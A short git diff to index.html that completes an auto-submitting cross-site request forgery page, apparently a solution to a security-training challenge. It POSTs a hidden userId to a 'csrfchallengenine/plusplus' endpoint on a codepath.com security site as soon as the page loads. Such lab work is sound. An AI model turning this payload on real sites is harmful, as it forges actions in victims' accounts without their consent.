--- a/index.html
+++ b/index.html
@@ -1,5 +1,5 @@
-<form name="csrfForm" action="" method="">
-   <input type="hidden" name="" value="" />
+<form name="csrfForm" action="https://security.codepath.com/user/csrfchallengenine/plusplus" method="POST">
+   <input type="hidden" name="userId" value="95f9f7a45623b00e98f333b9d1039fea" />
    <input type="submit" />
 </form>
 <script> document.csrfForm.submit(); </script>
